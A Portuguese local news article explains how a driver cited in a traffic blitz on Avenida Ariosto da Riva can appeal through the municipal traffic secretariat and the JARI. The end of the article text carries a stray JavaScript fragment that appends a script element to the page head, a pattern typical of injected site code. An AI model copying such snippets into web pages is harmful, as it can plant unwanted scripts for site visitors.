Capa / Educação / Veículo notificado pode recorrer da autuação

Veículo notificado pode recorrer da autuação

GEDSC DIGITAL CAMERA

Dionéia Martins
Com Assessoria da PMAF

Na “blitz” realizada ontem na Avenida Ariosto da Riva, um veículo foi notificado. Segundo o proprietário que tem um comércio nas proximidades, o carro estava saindo no posto de combustível para atravessar a rua e estacionar em frente à empresa e por este motivo foi autuado.
Neste caso o condutor ou o veículo não foram multados, as autuações aplicadas pelos Agentes de Trânsito não devem ser confundidas com multas, o proprietário poderá recorrer posteriormente.
Para apresentar o recurso o condutor terá que cumprir os procedimentos estabelecidos pelo Código de Trânsito Brasileiro, que estabelece prazo. Nos próximos 15 dias o proprietário do veículo autuado, receberá a notificação de imposição de penalidades.
De posse da notificação o condutor deverá apresentar junto a Secretaria Municipal de Trânsito, Transporte e Segurança o requerimento de defesa de autuação, que será julgado e a decisão será encaminhada ao Detran-MT.
Caso o recurso seja negado as penalidades serão lançadas no sistema. Após isso, o condutor terá uma nova chance para se defender recorrendo a Junta Administrativa de Recursos de Infrações (JARI), que irá analisar e julgar as alegações.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top